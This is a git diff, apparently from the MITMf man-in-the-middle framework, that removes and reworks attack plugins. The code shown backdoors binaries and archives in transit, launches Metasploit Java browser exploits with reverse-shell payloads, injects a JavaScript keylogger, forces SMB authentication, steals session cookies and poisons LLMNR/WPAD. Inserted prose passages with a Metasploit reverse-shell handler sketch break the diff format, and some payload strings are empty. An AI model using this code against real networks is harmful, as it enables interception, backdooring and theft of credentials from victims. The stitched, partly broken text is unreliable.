'encrypted' in str(e): - mitmf_logger.info('Encrypted zipfile found. Not patching.') - return aZipFile - - print "[*] ZipFile contents and info:" - - for info in zippyfile.infolist(): - print "\t", info.filename, info.date_time, info.file_size - - zippyfile.extractall(tmpDir) - - patchCount = 0 - - wasPatched = False - - for info in zippyfile.infolist(): - print "[*] >>> Next file in zipfile:", info.filename - - if os.path.isdir(tmpDir + '/' + info.filename) is True: - print info.filename, 'is a directory' - continue - - #Check against keywords - keywordCheck = False - - if type(self.zipblacklist) is str: - if self.zipblacklist.lower() in info.filename.lower(): - keywordCheck = True - - else: - for keyword in self.zipblacklist: - if keyword.lower() in info.filename.lower(): - keywordCheck = True - continue - - if keywordCheck is True: - print "[!] Zip blacklist enforced!" - mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename)) - continue - - patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) - - if patchResult: - patchCount += 1 - file2 = "backdoored/" + os.path.basename(info.filename) - print "[*] Patching complete, adding to zip file." - shutil.copyfile(file2, tmpDir + '/' + info.filename) - mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename)) - os.remove(file2) - wasPatched = True - else: - print "[!] Patching failed" - mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename)) - - print '-' * 10 - - if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting. 
- mitmf_logger.info("Met Zip config patchCount limit.") - break - - zippyfile.close() - - zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) - - print "[*] Writing to zipfile:", tmpFile - - for base, dirs, files in os.walk(tmpDir): - for afile in files: - filename = os.path.join(base, afile) - print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '') - zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) - - zipResult.close() - #clean up - shutil.rmtree(tmpDir) - - with open(tmpFile, 'rb') as f: - tempZipFile = f.read() - os.remove(tmpFile) - - if wasPatched is False: - print "[*] No files were patched forwarding original file" - self.patched.put(aZipFile) - return - else: - self.patched.put(tempZipFile) - return - - def handleResponse(self, request, data): - - content_header = request.client.headers['Content-Type'] - client_ip = request.client.getClientIP() - - if content_header in self.zipMimeTypes: - - if self.bytes_have_format(data, 'zip'): - mitmf_logger.info("{} Detected supported zip file type!".format(client_ip)) - - process = multiprocessing.Process(name='zip', target=self.zip, args=(data,)) - process.daemon = True - process.start() - process.join() - bd_zip = self.patched.get() - - if bd_zip: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_zip} - - else: - for tartype in ['gz','bz','tar']: - if self.bytes_have_format(data, tartype): - mitmf_logger.info("{} Detected supported tar file type!".format(client_ip)) - - process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) - process.daemon = True - process.start() - process.join() - bd_tar = self.patched.get() - - if bd_tar: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_tar} - - - elif content_header in self.binaryMimeTypes: - for bintype in ['pe','elf','fatfile','machox64','machox86']: - if self.bytes_have_format(data, bintype): - mitmf_logger.info("{} Detected supported binary type!".format(client_ip)) - fd, tmpFile = mkstemp() - with open(tmpFile, 'w') as f: - f.write(data) - - process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) - process.daemon = True - process.start() - process.join() - patchb = self.patched.get() - - if patchb: - bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() - os.remove('./backdoored/' + os.path.basename(tmpFile)) - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_binary} - - else: - mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header)) - return {'request': request, 'data': data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index 68cd277..a28375b 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -24,15 +24,10 @@ import re import sys import argparse -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr - from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.CacheKill import CacheKill -mitmf_logger = logging.getLogger('mitmf') - class Inject(CacheKill, Plugin): name = "Inject" optname = "inject" diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py deleted file mode 100644 index 15a292d..0000000 --- a/plugins/JavaPwn.py +++ /dev/null 
@@ -1,235 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import string -import random -import threading -import sys -import logging - -from core.msfrpc import Msfrpc -from plugins.plugin import Plugin -from plugins.BrowserProfiler import BrowserProfiler -from time import sleep - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr - -requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message -requests_log.setLevel(logging.WARNING) - -mitmf_logger = logging.getLogger('mitmf') - -class JavaPwn(BrowserProfiler, Plugin): - name = "JavaPwn" - optname = "javapwn" - desc = "Performs drive-by attacks on clients with out-of-date java browser plugins" - tree_output = [] - depends = ["Browserprofiler"] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.msfip = options.ip_address - self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit - - try: - msfcfg = options.configfile['MITMf']['Metasploit'] - except Exception, e: - sys.exit("[-] Error parsing Metasploit options in config file : " + str(e)) - - try: - self.javacfg = options.configfile['JavaPwn'] - except Exception, e: - sys.exit("[-] Error parsing config for JavaPwn: " + str(e)) - - self.msfport = msfcfg['msfport'] - self.rpcip = msfcfg['rpcip'] - self.rpcpass = msfcfg['rpcpass'] - - #Initialize the BrowserProfiler plugin - BrowserProfiler.initialize(self, options) - self.black_ips = [] - - try: - msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary - msf.login('msf', self.rpcpass) - version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v%s" % version) - except Exception: - sys.exit("[-] Error connecting to MSF! 
Make sure you started Metasploit and its MSGRPC server") - - t = threading.Thread(name='pwn', target=self.pwn, args=(msf,)) - t.setDaemon(True) - t.start() #start the main thread - - def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) - return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) - - def get_exploit(self, java_version): - exploits = [] - - client_vstring = java_version[:-len(java_version.split('.')[3])-1] - client_uversion = int(java_version.split('.')[3]) - - for ver in self.javacfg['Multi'].iteritems(): - if type(ver[1]) is list: - for list_vers in ver[1]: - - version_string = list_vers[:-len(list_vers.split('.')[3])-1] - update_version = int(list_vers.split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif (client_vstring == version_string): - if client_uversion <= update_version: - exploits.append(ver[0]) - else: - version_string = ver[1][:-len(ver[1].split('.')[3])-1] - update_version = int(ver[1].split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif client_vstring == version_string: - if client_uversion <= update_version: - exploits.append(ver[0]) - - return exploits - - - def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions - #inject iframe - mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip) - self.html_payload = "" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects - - mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip) - - exit = False - i = 1 - while i <= 30: #wait max 60 seconds for a new shell - if exit: - break - shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions - if len(shell) > 0: - for k, v in shell.iteritems(): - if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted - mitmf_logger.info("%s >> Got shell!" 
% client_ip) - self.sploited_ips.append(client_ip) #target successfuly exploited :) - self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped - exit = True - break - sleep(2) - i += 1 - - if exit is False: #We didn't get a shell :( - mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip) - - self.html_payload = self.get_payload() # restart the BrowserProfiler plugin - - def send_command(self, cmd, msf, vic_ip): - try: - mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip) - - #Create a virtual console - console_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [console_id, cmd]) - - mitmf_logger.info("%s >> commands sent succesfully" % vic_ip) - except Exception, e: - mitmf_logger.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e)) - - def pwn(self, msf): - while True: - if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled - - brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format - - if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited - - vic_ip = brwprofile['ip'] - - mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version'])) - mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip) - - exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg - - if exploits: - - if len(exploits) > 1: - mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits))) - exploit = random.choice(exploits) - mitmf_logger.info("%s >> choosing %s" %(vic_ip, exploit)) - else: - mitmf_logger.info("%s >> client is vulnerable to %s!" 
% (vic_ip, exploits[0])) - exploit = exploits[0] - - #here we check to see if we already set up the exploit to avoid creating new jobs for no reason - jobs = msf.call('job.list') #get running jobs - if len(jobs) > 0: - for k, v in jobs.iteritems(): - info = msf.call('job.info', [k]) - if exploit in info['name']: - mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit)) - url = info['uripath'] #get the url assigned to the exploit - self.injectWait(msf, url, vic_ip) - - else: #here we setup the exploit - rand_port = random.randint(1000, 65535) #generate a random port for the payload listener - rand_url = self.rand_url() - #generate the command string to send to the virtual console - #new line character very important as it simulates a user pressing enter - cmd = "use exploit/%s\n" % exploit - cmd += "set SRVPORT %s\n" % self.msfport - cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform - cmd += "set LHOST %s\n" % self.msfip - cmd += "set LPORT %s\n" % rand_port - cmd += "exploit -j\n" - - mitmf_logger.debug("command string:\n%s" % cmd) - - self.send_command(cmd, msf, vic_ip) - - self.injectWait(msf, rand_url, vic_ip) - else: - #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert) - mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip) - mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip) - - rand_url = self.rand_url() - rand_port = random.randint(1000, 65535) - - cmd = "use exploit/multi/browser/java_signed_applet\n" - cmd += "set SRVPORT %s\n" % self.msfport - cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" - cmd += "set LHOST %s\n" % self.msfip - cmd += "set LPORT %s\n" % rand_port - cmd += "exploit -j\n" - - self.send_command(cmd, msf, vic_ip) - self.injectWait(msf, rand_url, vic_ip) - sleep(1) diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py deleted file mode 100644 index 8acfe96..0000000 --- a/plugins/JsKeylogger.py +++ /dev/null @@ -1,169 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
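Both of the removed plugins that needed Metasploit (FilePwn and JavaPwn) talked to it the same way: log in to the MSGRPC server through core.msfrpc, then push msfconsole commands through a virtual console and poll the job list. A minimal sketch of that pattern, assuming MSGRPC is running and using placeholder addresses, ports and credentials:

```
from core.msfrpc import Msfrpc

msf = Msfrpc({"host": "127.0.0.1"})                # rpcip from the [Metasploit] config section
msf.login('msf', 'abc123')                         # placeholder rpcpass
print "Connected to Metasploit v%s" % msf.call('core.version')['version']

cmd  = "use exploit/multi/handler\n"               # newline simulates pressing enter in msfconsole
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
cmd += "set LHOST 192.168.1.10\n"                  # placeholder attacker IP
cmd += "set LPORT 4444\n"                          # placeholder listener port
cmd += "exploit -j\n"

console_id = msf.call('console.create')['id']      # create a virtual console
msf.call('console.write', [console_id, cmd])       # write the commands to it

for pid in msf.call('job.list'):                   # verify the handler job came up
    print msf.call('job.info', [pid])['name']
```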
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -import logging - -mitmf_logger = logging.getLogger('mitmf') - -class jskeylogger(Inject, Plugin): - name = "Javascript Keylogger" - optname = "jskeylogger" - desc = "Injects a javascript keylogger into clients webpages" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" - has_opts = False - - def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.msf_keylogger() - - def sendPostData(self, request): - #Handle the plugin output - if 'keylog' in request.uri: - - raw_keys = request.postData.split("&&")[0] - keys = raw_keys.split(",") - del keys[0]; del(keys[len(keys)-1]) - - input_field = request.postData.split("&&")[1] - - nice = '' - for n in keys: - if n == '9': - nice += "" - elif n == '8': - nice = nice.replace(nice[-1:], "") - elif n == '13': - nice = '' - else: - try: - nice += n.decode('hex') - except: - mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n)) - - #try: - # input_field = input_field.decode('hex') - #except: - # mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field)) - - mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice)) - - def msf_keylogger(self): - #Stolen from the Metasploit module http_javascript_keylogger - - payload = """""" - - return payload \ No newline at end of file diff --git a/plugins/Replace.py b/plugins/Replace.py deleted file mode 100644 index f623736..0000000 --- a/plugins/Replace.py +++ /dev/null @@ -1,105 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -""" -Plugin by @rubenthijssen -""" - -import sys -import logging -import time -import re -from plugins.plugin import Plugin -from plugins.CacheKill import CacheKill - -mitmf_logger = logging.getLogger('mitmf') - -class Replace(CacheKill, Plugin): - name = "Replace" - optname = "replace" - desc = "Replace arbitrary content in HTML content" - implements = ["handleResponse", "handleHeader", "connectionMade"] - depends = ["CacheKill"] - version = "0.1" - has_opts = True - - def initialize(self, options): - self.options = options - - self.search_str = options.search_str - self.replace_str = options.replace_str - self.regex_file = options.regex_file - - if (self.search_str is None or self.search_str == "") and self.regex_file is None: - sys.exit("[-] Please provide a search string or a regex file") - - self.regexes = [] - if self.regex_file is not None: - for line in self.regex_file: - self.regexes.append(line.strip().split("\t")) - - if self.options.keep_cache: - self.implements.remove("handleHeader") - self.implements.remove("connectionMade") - - self.ctable = {} - self.dtable = {} - self.mime = "text/html" - - def handleResponse(self, request, data): - ip, hn, mime = self._get_req_info(request) - - if self._should_replace(ip, hn, mime): - - if self.search_str is not None and self.search_str != "": - data = data.replace(self.search_str, self.replace_str) - mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str)) - - # Did the user provide us with a regex file? - for regex in self.regexes: - try: - data = re.sub(regex[0], regex[1], data) - - mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) - except Exception: - logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) - - self.ctable[ip] = time.time() - self.dtable[ip+hn] = True - - return {'request': request, 'data': data} - - return - - def add_options(self, options): - options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)") - options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.") - options.add_argument("--regex-file", type=file, help="Load file with regexes. 
File format: [tab][new-line]") - options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.") - - def _should_replace(self, ip, hn, mime): - return mime.find(self.mime) != -1 - - def _get_req_info(self, request): - ip = request.client.getClientIP() - hn = request.client.getRequestHostname() - mime = request.client.headers['Content-Type'] - - return (ip, hn, mime) diff --git a/plugins/Responder.py b/plugins/Responder.py index 81c0186..676553f 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -23,9 +23,10 @@ import os import threading from plugins.plugin import Plugin -from libs.responder.Responder import ResponderMITMf -from core.sslstrip.DnsCache import DnsCache from twisted.internet import reactor +from core.responder.wpad.WPADPoisoner import WPADPoisoner +from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner +from core.utils import SystemConfig class Responder(Plugin): name = "Responder" @@ -37,37 +38,32 @@ class Responder(Plugin): def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' - self.options = options + self.options = options self.interface = options.interface + self.ourip = SystemConfig.getIP(options.interface) try: - config = options.configfile['Responder'] + config = self.config['Responder'] except Exception, e: sys.exit('[-] Error parsing config for Responder: ' + str(e)) - if options.Analyze: + LLMNRPoisoner().start(options, self.ourip) + + if options.wpad: + WPADPoisoner().start() + + if options.analyze: self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") - resp = ResponderMITMf() - resp.setCoreVars(options, config) - - result = resp.AnalyzeICMPRedirect() - if result: - for line in result: - self.tree_output.append(line) - - resp.printDebugInfo() - resp.start() - - def plugin_reactor(self, strippingFactory): + def pluginReactor(self, strippingFactory): reactor.listenTCP(3141, strippingFactory) def add_options(self, options): - options.add_argument('--analyze', dest="Analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") - options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") - options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") - options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. 
Default value is False") - options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") - options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") + options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") + options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") + options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") + options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") + options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") + options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False") + options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") + options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py deleted file mode 100644 index a1df8fe..0000000 --- a/plugins/SMBAuth.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -import sys -import logging - -class SMBAuth(Inject, Plugin): - name = "SMBAuth" - optname = "smbauth" - desc = "Evoke SMB challenge-response auth attempts" - depends = ["Inject"] - version = "0.1" - has_opts = True - - def initialize(self, options): - Inject.initialize(self, options) - self.target_ip = options.host - - if not self.target_ip: - self.target_ip = options.ip_address - - self.html_payload = self._get_data() - - def add_options(self, options): - options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]") - - def _get_data(self): - return ''\ - ''\ - '' % tuple([self.target_ip]*3) diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py deleted file mode 100644 index 282b909..0000000 --- a/plugins/SSLstrip+.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import sys -import logging - -from plugins.plugin import Plugin -from core.utils import IpTables -from core.sslstrip.URLMonitor import URLMonitor -from core.dnschef.dnschef import DNSChef - -class HSTSbypass(Plugin): - name = 'SSLstrip+' - optname = 'hsts' - desc = 'Enables SSLstrip+ for partial HSTS bypass' - version = "0.4" - tree_output = ["SSLstrip+ by Leonardo Nve running"] - has_opts = False - - def initialize(self, options): - self.options = options - self.manualiptables = options.manualiptables - - try: - hstsconfig = options.configfile['SSLstrip+'] - except Exception, e: - sys.exit("[-] Error parsing config for SSLstrip+: " + str(e)) - - if not options.manualiptables: - if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, options.configfile['MITMf']['DNS']['port']) - - URLMonitor.getInstance().setHstsBypass(hstsconfig) - DNSChef.getInstance().setHstsBypass(hstsconfig) - - def finish(self): - if not self.manualiptables: - if IpTables.getInstance().dns is True: - IpTables.getInstance().Flush() \ No newline at end of file diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py deleted file mode 100644 index ff9a3ec..0000000 --- a/plugins/SessionHijacker.py +++ /dev/null @@ -1,187 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. 
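Both of the plugins deleted above (SMBAuth here, and the Javascript keylogger earlier) follow the same pattern: subclass Inject, let it initialize itself, then hand it HTML via self.html_payload. A hedged skeleton of that pattern is shown below; it only makes sense inside a MITMf checkout, the class name is invented, and the payload string is a placeholder rather than the original SMBAuth markup, which is not reproduced in this diff.

```
# Sketch of the Inject-based plugin pattern used by the deleted SMBAuth and
# jskeylogger plugins. The class and payload are illustrative placeholders.
from plugins.plugin import Plugin
from plugins.Inject import Inject

class ExampleInjector(Inject, Plugin):
    name     = "Example Injector"
    optname  = "exampleinjector"
    desc     = "Demonstrates the Inject-based plugin pattern"
    depends  = ["Inject"]
    version  = "0.1"
    has_opts = False

    def initialize(self, options):
        Inject.initialize(self, options)         # let Inject set up its own state
        self.html_payload = "<!-- injected -->"  # content Inject adds to proxied pages
```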
-# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb - -from plugins.plugin import Plugin -from core.publicsuffix.publicsuffix import PublicSuffixList -from urlparse import urlparse -import threading -import os -import sys -import time -import logging -import sqlite3 -import json -import socket - -mitmf_logger = logging.getLogger('mitmf') - -class SessionHijacker(Plugin): - name = "Session Hijacker" - optname = "hijack" - desc = "Performs session hijacking attacks against clients" - implements = ["cleanHeaders"] #["handleHeader"] - version = "0.1" - has_opts = True - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.psl = PublicSuffixList() - self.firefox = options.firefox - self.mallory = options.mallory - self.save_dir = "./logs" - self.seen_hosts = {} - self.sql_conns = {} - self.sessions = [] - self.html_header="

Cookies sniffed for the following domains\n
\n
" - - #Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires - #SQLite version 3.7.0 or later. You won't be able to read the database files - #with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted - #or is not a database" message. - - sqlv = sqlite3.sqlite_version.split('.') - if (sqlv[0] <3 or sqlv[1] < 7): - sys.exit("[-] sqlite3 version 3.7 or greater required") - - if not os.path.exists("./logs"): - os.makedirs("./logs") - - if self.mallory: - t = threading.Thread(name='mallory_server', target=self.mallory_server, args=()) - t.setDaemon(True) - t.start() - - def cleanHeaders(self, request): # Client => Server - headers = request.getAllHeaders().copy() - client_ip = request.getClientIP() - - if 'cookie' in headers: - - if self.firefox: - url = "http://" + headers['host'] + request.getPathFromUri() - for cookie in headers['cookie'].split(';'): - eq = cookie.find("=") - cname = str(cookie)[0:eq].strip() - cvalue = str(cookie)[eq+1:].strip() - self.firefoxdb(headers['host'], cname, cvalue, url, client_ip) - - mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip) - - if self.mallory: - if len(self.sessions) > 0: - temp = [] - for session in self.sessions: - temp.append(session[0]) - if headers['host'] not in temp: - self.sessions.append((headers['host'], headers['cookie'])) - mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) - mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) - else: - self.sessions.append((headers['host'], headers['cookie'])) - mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) - mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) - - #def handleHeader(self, request, key, value): # Server => Client - # if 'set-cookie' in request.client.headers: - # cookie = request.client.headers['set-cookie'] - # #host = request.client.headers['host'] #wtf???? 
